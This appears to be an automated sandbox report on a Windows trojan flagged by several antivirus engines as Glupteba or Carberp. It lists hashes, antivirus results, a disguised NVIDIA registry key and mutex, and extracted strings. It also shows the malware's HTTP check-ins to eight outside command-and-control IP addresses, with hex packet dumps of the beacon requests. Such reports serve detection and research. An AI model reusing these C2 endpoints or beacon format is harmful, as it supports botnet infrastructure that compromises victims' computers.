Analysis Date2015-02-14 09:52:50
MD5973d1e2aee67eced0839191770ccf09c
SHA199577747124f162c3730349eb19642b0352170e1

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 10dd61995decd8cbe68931ca6a9479f5 sha1: ba7cfee8e6d1358ba534c35d6f821e91c9e994a4 size: 90112
Section.rdata md5: 66329b13be5b7859127400967574535d sha1: 39ffc5c168a70c8e4cf8eef6c5f6ee65fb3e9c79 size: 20480
Section.data md5: b37492e408b1a4b57876bbdc47f297fe sha1: ff500d0fc91fdf0b1026e10cc3f59097b0d2b3c2 size: 8192
Section.rsrc md5: 728090b02f32116382fec7e84dc82f2a sha1: 40099e5c452e4321668ced2bd7c42914ae843725 size: 4096
Timestamp2015-01-30 11:16:01
PackerMicrosoft Visual C++ v6.0
PEhashcf71b4a56b4f3964b35f25853347383d48ff9801
IMPhash287310ce84b96d2c84675aa2a375b20f
AV360 Safeno_virus
AVAd-Awareno_virus
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)TR/Crypt.ZPACK.88240
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebError Scanning File
AVEmsisoftno_virus
AVEset (nod32)Win32/Glupteba.M
AVFortinetW32/Kryptik.CWDU!tr
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)Small.GWD
AVIkarusTrojan.Win32.Glupteba
AVK7no_virus
AVKasperskyno_virus
AVMalwareBytesTrojan.Agent
AVMcafeeno_virus
AVMicrosoft Security EssentialsTrojan:Win32/Carberp.I
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝
15150124\\x00
Creates File\Device\Afd\Endpoint
Creates MutexGlobal\MD7H82HHF7EH2D73

Network Details:

HTTP GEThttp://206.130.99.82:38102/stat?uid=100&downlink=1111&uplink=1111&id=00016C90&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://213.238.168.2:33879/stat?uid=100&downlink=1111&uplink=1111&id=00018056&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://88.150.237.108:38727/stat?uid=100&downlink=1111&uplink=1111&id=000193FD&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://217.23.14.191:26195/stat?uid=100&downlink=1111&uplink=1111&id=0001A7A5&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://173.236.140.15:16577/stat?uid=100&downlink=1111&uplink=1111&id=0001BB3C&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://207.19.62.122:32406/stat?uid=100&downlink=1111&uplink=1111&id=0001CED4&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://62.210.217.195:49126/stat?uid=100&downlink=1111&uplink=1111&id=0001E26C&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
HTTP GEThttp://108.163.247.82:49891/stat?uid=100&downlink=1111&uplink=1111&id=0001F603&statpass=bpass&version=15150124&features=30&guid=defdee8c-83e1-4289-94e1-db37f2c2cebf&comment=15150124&p=0&s=
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 206.130.99.82:38102
Flows TCP192.168.1.1:1031 ➝ 206.130.99.82:38102
Flows TCP192.168.1.1:1032 ➝ 213.238.168.2:33879
Flows TCP192.168.1.1:1033 ➝ 88.150.237.108:38727
Flows TCP192.168.1.1:1034 ➝ 217.23.14.191:26195
Flows TCP192.168.1.1:1035 ➝ 173.236.140.15:16577
Flows TCP192.168.1.1:1036 ➝ 207.19.62.122:32406
Flows TCP192.168.1.1:1037 ➝ 62.210.217.195:49126
Flows TCP192.168.1.1:1038 ➝ 108.163.247.82:49891

Raw Pcap
0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303136 43393026 73746174 70617373   0016C90&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303138 30353626 73746174 70617373   0018056&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303139 33464426 73746174 70617373   00193FD&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303141 37413526 73746174 70617373   001A7A5&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303142 42334326 73746174 70617373   001BB3C&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303143 45443426 73746174 70617373   001CED4&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303145 32364326 73746174 70617373   001E26C&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..

0x00000000 (00000)   47455420 2f737461 743f7569 643d3130   GET /stat?uid=10
0x00000010 (00016)   3026646f 776e6c69 6e6b3d31 31313126   0&downlink=1111&
0x00000020 (00032)   75706c69 6e6b3d31 31313126 69643d30   uplink=1111&id=0
0x00000030 (00048)   30303146 36303326 73746174 70617373   001F603&statpass
0x00000040 (00064)   3d627061 73732676 65727369 6f6e3d31   =bpass&version=1
0x00000050 (00080)   35313530 31323426 66656174 75726573   5150124&features
0x00000060 (00096)   3d333026 67756964 3d646566 64656538   =30&guid=defdee8
0x00000070 (00112)   632d3833 65312d34 3238392d 39346531   c-83e1-4289-94e1
0x00000080 (00128)   2d646233 37663263 32636562 6626636f   -db37f2c2cebf&co
0x00000090 (00144)   6d6d656e 743d3135 31353031 32342670   mment=15150124&p
0x000000a0 (00160)   3d302673 3d204854 54502f31 2e300d0a   =0&s= HTTP/1.0..
0x000000b0 (00176)   0d0a                                  ..


Strings

$.2'
a4WzWS DFF3X0u
active
Ao6350a
AqeoD bfX38P53 K5J7 S19ed26
AYu2F sz9djw29
b2rJKk k6v1 v1dKZ b7up6A
b54Z r483m Lsi510
Bioware Corp.
Book Antiqua
C7b35Pt
Calibri
<Cambria
CompanyName
Courier New
cW7V4LB
D87mj GHbsu V12
Dj73WW32 bRxd Q18V638
E23U ZN40V6
EEk7AW g6451L
EkH45 JQ756id Q35s70R SQtY
Em3L QhRg
iA9fJM60 P32 q9i4990
IsG2k12 oh5EBOBn Mu29 RY43m5sG
jX3239D6m
k1qN L148m71r J049llf3 C43V8y28
K7Dn8A8052
K98P29
kpv18f kyM
Ky4k60
lQX93170
Ls4iKI
m3Ec7587 JmS
MS Sans Serif
'n*+
nK6b57pY b97K
o>)%
O6ep tOe
oqi873R0677
p34X8 aw69q50 He6M6g91 H0js
QAX35O7o s8if o0M9C69O t7jT96E
QpR78BU9 d97Y881N Nt8
R5.&
retrievers
rhythmic
rill
Rr46 u3F1DF1 C238099
S46T1
s53093o y0F837 hMrY0 dVv8156A
sectioning
Segoe UI
smartening
sparrow
spectroscopic
spirants
split
stabler
staff
stationer
stratified
supervised
t34PwZ75 jJ46wZ tcl7cxeo
tampered
tartans
telegraph
testings
thunderous
tinsel
trouncing
turf
uL4TjhP s8f9ul8 L1q288v
unannounced
unintelligent
V0P4g4Y g0IP
v2O99m9
vermin
vibrates
visage
viscosity
vocational
VS_VERSION_INFO
vTO949G3K70
w0j29pk8 d1hHF4i7
warding
wedge
xXzil4G0 Gp17353C y6Gzf
Y55ky
ydDWF
yellowish
ZHl i7O1eg4
?##%(&
*0 !??.24(+
0Rx-C7
 3*&&/
[5*{bv
6'1: ##8
7>&%$$##
?-&&8'
_acmdln
AddPrinterConnectionA
AddPrintProvidorW
_adjust_fdiv
AdvancedDocumentPropertiesA
a;hsDb
BeginUpdateResourceW
B!L$8$
CallNextHookEx
C;BSbo
ChangeClipboardChain
CharLowerBuffA
ChooseColorA
ClosePrinter
comdlg32.dll
CommDlgExtendedError
ConfigurePortA
_controlfp
CreateConsoleScreenBuffer
CreateDialogParamW
CreateMailslotA
CreatePipe
CreateProcessW
CreateUrlCacheGroup
@.data
DdeClientTransaction
DdeGetLastError
DdeInitializeA
DdeNameService
DeleteMonitorA
DeletePortA
DeletePrinterDataA
DeletePrinterDriverA
DeletePrinterDriverExW
DeletePrinterKeyA
DeletePrintProvidorA
DeviceIoControl
DisconnectNamedPipe
DosDateTimeToFileTime
DrawAnimatedRects
DrawTextExA
[|{d]t
D<w:ci
e	4"|jQ
eM`ai+	Y/
EnableMenuItem
EnableScrollBar
EnumDateFormatsW
EnumPrinterDataExA
EnumPrintProcessorsW
EnumPropsExW
EnumSystemLocalesW
EraseTape
_except_handler3
$e=zG3
FileTimeToSystemTime
FillConsoleOutputAttribute
FillConsoleOutputCharacterA
FindClosePrinterChangeNotification
FindFirstUrlCacheEntryW
FindTextA
FreeEnvironmentStringsA
FreeLibraryAndExitThread
FtpOpenFileW
FtpPutFileA
FtpRemoveDirectoryA
FtpSetCurrentDirectoryW
 +&gb_Z
GetAtomNameA
GetClassInfoExW
GetClassNameW
GetCommandLineA
GetDoubleClickTime
GetFileSize
GetFileTitleA
GetFileVersionInfoSizeW
GetFormW
GetKeyboardType
__getmainargs
GetModuleHandleA
GetNamedPipeHandleStateW
GetPrinterDataW
GetPrivateProfileIntA
GetProfileSectionA
GetQueueStatus
GetSaveFileNameW
GetStartupInfoA
GetSystemTime
GetTapePosition
GetVersion
GetWindowLongA
GetWindowTextA
GlobalAlloc
GlobalFlags
GlobalLock
GopherGetAttributeW
GopherOpenFileW
H;}6}Fo
h@F-dC
HttpOpenRequestA
I2]!Wb
ImageAddCertificate
IMAGEHLP.dll
ImageNtHeader
IMM32.dll
ImmGetContext
_initterm
InsertMenuItemA
InternetAutodial
InternetCanonicalizeUrlA
InternetCanonicalizeUrlW
InternetCloseHandle
InternetCombineUrlA
InternetCrackUrlA
InternetFindNextFileW
InternetGetLastResponseInfoA
InternetLockRequestFile
InternetOpenUrlW
InternetQueryOptionA
InternetReadFileExW
InternetSetCookieA
IsWindowUnicode
\IT)[c
iXPF)X
|js3P~"
KERNEL32.dll
LoadImageA
LoadKeyboardLayoutA
LoadMenuIndirectW
MakeSureDirectoryPathExists
ModifyMenuA
MsgWaitForMultipleObjects
Msi.dll
MSVCRT.dll
=n<bTy,
NDdeApi.dll
'Nv yEW
PageSetupDlgW
__p__commode
__p__fmode
PostQuitMessage
RadwAKH
`.rdata
RetrieveUrlCacheEntryStreamA
r|#u}@
SearchTreeForFile
__set_app_type
SetupAddToDiskSpaceListA
SETUPAPI.dll
SetupCloseFileQueue
SetupCloseLog
SetupCopyOEMInfA
SetupCopyOEMInfW
SetupCreateDiskSpaceListA
SetupDefaultQueueCallbackA
SetupDiBuildDriverInfoList
SetupDiCallClassInstaller
SetupDiCancelDriverInfoSearch
SetupDiClassGuidsFromNameA
SetupDiClassNameFromGuidExW
SetupDiClassNameFromGuidW
SetupDiCreateDeviceInfoListExW
SetupDiCreateDeviceInfoW
SetupDiCreateDevRegKeyW
SetupDiGetActualSectionToInstallW
SetupDiGetClassImageListExA
SetupDiGetDeviceInfoListDetailW
SetupDiGetDeviceInstanceIdA
SetupDiGetDeviceInstanceIdW
SetupDiGetDeviceInterfaceAlias
SetupDiGetDriverInstallParamsA
SetupDiGetHwProfileFriendlyNameExA
SetupDiGetHwProfileFriendlyNameExW
SetupDiGetHwProfileFriendlyNameW
SetupDiGetINFClassA
SetupDiInstallClassExA
SetupDiInstallDeviceInterfaces
SetupDiInstallDriverFiles
SetupDiMoveDuplicateDevice
SetupDiOpenDeviceInfoA
SetupDiRegisterCoDeviceInstallers
SetupDiSetDeviceInstallParamsW
SetupDiSetDeviceRegistryPropertyA
SetupDiSetSelectedDevice
SetupDiUnremoveDevice
SetupDuplicateDiskSpaceListW
SetupFreeSourceListA
SetupGetBinaryField
SetupGetFileCompressionInfoA
SetupGetInfFileListA
SetupGetInfInformationA
SetupGetInfInformationW
SetupGetLineTextW
SetupGetMultiSzFieldA
SetupGetSourceFileLocationW
SetupGetSourceFileSizeW
SetupGetTargetPathA
SetupInstallFilesFromInfSectionA
SetupLogErrorA
SetupOpenInfFileW
SetupQueryInfFileInformationW
SetupQueueDefaultCopyW
SetupQueueDeleteA
SetupQueueDeleteW
SetupRemoveInstallSectionFromDiskSpaceListA
__setusermatherr
SetWindowPos
SHELL32.dll
Shell_NotifyIconA
s)!_<s9
SymGetSymFromAddr
SymInitialize
!This program cannot be run in DOS mode.
ToAsciiEx
USER32.dll
uu4OLD
VerFindFileA
VerQueryValueW
VERSION.dll
WaitForPrinterChange
WININET.dll
WINSPOOL.DRV
{	WK`K
_XcptFilter
y.~k:G
ZU32#nH